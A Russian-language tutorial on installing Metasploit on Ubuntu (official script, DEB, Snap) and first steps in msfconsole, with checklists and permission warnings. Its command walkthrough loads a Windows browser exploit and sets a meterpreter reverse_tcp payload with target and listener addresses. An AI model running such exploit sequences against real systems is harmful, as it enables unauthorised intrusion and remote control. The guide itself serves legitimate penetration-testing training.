Гид по технологиям

Как установить и начать работу с Metasploit на Ubuntu

5 min read Безопасность Обновлено 04 Jan 2026
Установка Metasploit на Ubuntu и быстрое руководство
Установка Metasploit на Ubuntu и быстрое руководство

Человек за рабочей станцией с двумя мониторами

Что такое Metasploit и зачем он нужен

Ретро-компьютер Apple

Metasploit — это фреймворк для разработки, тестирования и автоматизации эксплойтов. Кратко: это набор инструментов, модулей и утилит, которые помогают обнаруживать уязвимости и отрабатывать сценарии эксплуатации. Примеры использования:

  • Тестирование безопасности собственной сети и приложений.
  • Подготовка к сертификациям и обучению по белому хакерству.
  • Исследование эксплойтов и их адаптация для конкретных сред.

Короткое определение: Metasploit — это коллекция модулей для обнаружения и эксплуатации уязвимостей, интегрированная в консольную среду msfconsole.

Важно: Запуск и использование Metasploit против систем, на которые у вас нет явного разрешения, незаконен. Всегда получайте письменное согласие перед тестированием.

Основные способы установки на Ubuntu

Запуск скрипта установки Metasploit на Ubuntu

Разработчики Rapid7 рекомендуют официальный скрипт установки — он автоматизирует загрузку и размещение бинарников. Ниже — три распространённых варианта установки:

  1. Официальный скрипт установки (рекомендуется для большинства пользователей).
  2. DEB-пакет с apt.metasploit.com (подходит для офлайн-инсталляций или контроля версий).
  3. Snap-пакет (удобно для быстрой установки в контейнированных средах).

Установка через официальный скрипт

В терминале выполните одну команду, чтобы загрузить скрипт, сделать его исполняемым и запустить:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

Если вы хотите сначала просмотреть содержимое скрипта, выполните:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb

После установки бинарники окажутся в /opt/metasploit-framework/bin/. Для запуска введите:

msfconsole

Установка через DEB-пакет

Перейдите на apt.metasploit.com, прокрутите страницу вниз и выберите DEB-файл, соответствующий вашей архитектуре (AMD64, ARM64, i386). В терминале установите пакет:

sudo dpkg -i metasploit-package.deb

Примечание: имена пакетов формируются ежедневно, поэтому точное имя файла будет зависеть от даты сборки и архитектуры.

Установка через Snap

Если вы предпочитаете Snap, Metasploit доступен в Snap Store. После установки Snap выполните установку через snap install (проверьте имя пакета в каталоге Snap).

msfconsole

…запустит консоль Metasploit независимо от способа установки.

Первый запуск и начальная настройка

Первый запуск msfconsole Metasploit

При первом запуске Metasploit инициирует мастер установки, который задаст вопросы для начальной конфигурации. Обычно потребуется:

  • Подтвердить создание новой базы данных (введите “Yes” при запросе).
  • Выбрать, инициализировать ли веб-сервис для удалённого управления через браузер.
  • При желании задать учётные данные для веб-интерфейса (если веб-сервис будет включён).

Если вы согласитесь на создание базы данных, Metasploit настроит PostgreSQL и связанные параметры. По завершении вы увидите сообщение “Metasploit Framework Initial Setup Complete”.

Основы работы в msfconsole

Справка и команды Metasploit в консоли

После запуска вы увидите приглашение msf6 или msf7 и сможете работать в интерактивной консоли.

  • Для просмотра доступных команд введите:
help
  • Чтобы загрузить модуль эксплойта, используйте команду use с указанием пути модуля:
use exploit/windows/browser/aol_ampx_convertfile
  • После загрузки модуля просмотрите доступные опции и информацию:
show
  • Для установки опций применения:
set RHOSTS 192.168.1.10
set LHOST 10.0.0.5
set PAYLOAD windows/meterpreter/reverse_tcp
  • Для запуска эксплойта:
run

Методика безопасной проверки и тесты приёмки

Ниже — мини-методология и критерии приёмки для базовой проверки установки Metasploit и её работоспособности.

Мини-методология:

  1. Установите Metasploit в тестовой среде (виртуальная машина или изолированная сеть).
  2. Запустите msfconsole и выполните инициализацию базы данных.
  3. Загрузите простой модуль-эксплойт в локальной тестовой машине и выполните его в безопасной среде.
  4. Проверьте логирование, доступность msfweb (если включён), и целостность файлов в /opt/metasploit-framework.

Критерии приёмки:

  • msfconsole запускается без ошибок.
  • База данных успешно инициализирована и подключена.
  • Доступ к исполняемым бинарникам есть у пользователя, выполняющего тест.
  • Тестовый модуль выполняется в контролируемой среде и возвращает ожидаемые результаты.

Ролевые чеклисты

Для разных ролей полезны разные проверки и конфигурации.

Администратор системы:

  • Проверить владельца и права каталога /opt/metasploit-framework.
  • Настроить автоматические обновления и плановые бэкапы.
  • Ограничить доступ к машинным учётным записям, использующим Metasploit.

Пентестер:

  • Использовать изолированную VM для отработки эксплойтов.
  • Подключать Metasploit к тестовой сети и контролировать трафик.
  • Вести журнал действий и документировать результаты тестов.

Новичок:

  • Начать с базовых команд help, search, use, show, set, run.
  • Не тестировать вне разрешённой среды.
  • Пользоваться учебными лабораториями (VirtualBox/VMware, WebGoat, DVWA).

Альтернативы и когда Metasploit не подойдёт

  • OpenVAS и Nessus — для автоматического сканирования уязвимостей (без фокусировки на эксплуатации).
  • Nmap — для картирования сети и обнаружения сервисов.
  • Burp Suite — для тестирования веб-приложений.

Когда Metasploit может не подойти:

  • Нужно узкоспециализированное тестирование веб-приложений — лучше Burp.
  • Требуется полная автоматизация сканирования инфраструктуры со сложными политиками — OpenVAS/Nessus будут эффективнее.

Безопасность, харднинг и операционные рекомендации

  • Храните Metasploit и связанные пакеты в актуальном состоянии — обновления исправляют баги и уязвимости.
  • Размещайте Metasploit в изолированной среде при тестировании (VM, отдельная VLAN).
  • Не храните пароли и приватные ключи в открытом виде; используйте менеджеры секретов.
  • Логи и результаты тестов держите в защищённом хранилище и ограничьте доступ по ролям.

Устранение неполадок

  • Если msfconsole не запускается, проверьте логи PostgreSQL и права на каталог /opt/metasploit-framework.
  • При ошибках установки через dpkg используйте sudo apt –fix-broken install.
  • Если веб-сервис не стартует, проверьте порт и наличие конфликтующих сервисов.

Решение: какую стратегию установки выбрать

flowchart TD
  A[Нужен Metasploit?] --> B{Есть ли доступ к интернету?}
  B -- Да --> C{Нужен быстрый старт?}
  C -- Да --> D[Официальный скрипт]
  C -- Нет --> E[DEB с apt.metasploit.com]
  B -- Нет --> E
  D --> F[Запустить msfconsole и настроить БД]
  E --> F
  F --> G{Нужен изолированный пакет?}
  G -- Да --> H[Использовать VM и снапшоты]
  G -- Нет --> I[Эксплуатировать в тестовой сети]

1‑строчный глоссарий

  • msfconsole — интерактивная консоль Metasploit.
  • Эксплойт — код, использующий уязвимость в ПО.
  • Payload — полезная нагрузка, выполняемая после успешной эксплуатации.

Примеры тест-кейсов приёмки

  1. Установка по скрипту завершается без ошибок, msfconsole запускается.
  2. Инициализация базы данных проходит успешно, Metasploit подключается к PostgreSQL.
  3. Тестовый эксплойт в изолированной VM выполняется и создаёт ожидаемую сессию meterpreter.
  4. Веб-интерфейс (если включён) доступен по заданному логину и паролю.

Краткое резюме

Metasploit — мощный инструмент для пентестинга и исследования уязвимостей. На Ubuntu его проще всего установить через официальный скрипт, DEB-пакет или Snap. Всегда используйте Metasploit в разрешённой и изолированной среде, храните результаты тестов безопасно и регулярно обновляйте ПО.

Важно: выполняйте тестирование только с письменного разрешения владельцев систем.

Поделиться: X/Twitter Facebook LinkedIn Telegram
Автор
Редакция

Похожие материалы

RDP: полный гид по настройке и безопасности
Инфраструктура

RDP: полный гид по настройке и безопасности

Android как клавиатура и трекпад для Windows
Гайды

Android как клавиатура и трекпад для Windows

Советы и приёмы для работы с PDF
Документы

Советы и приёмы для работы с PDF

Calibration в Lightroom Classic: как и когда использовать
Фото

Calibration в Lightroom Classic: как и когда использовать

Отключить Siri Suggestions на iPhone
iOS

Отключить Siri Suggestions на iPhone

Рисование таблиц в Microsoft Word — руководство
Office

Рисование таблиц в Microsoft Word — руководство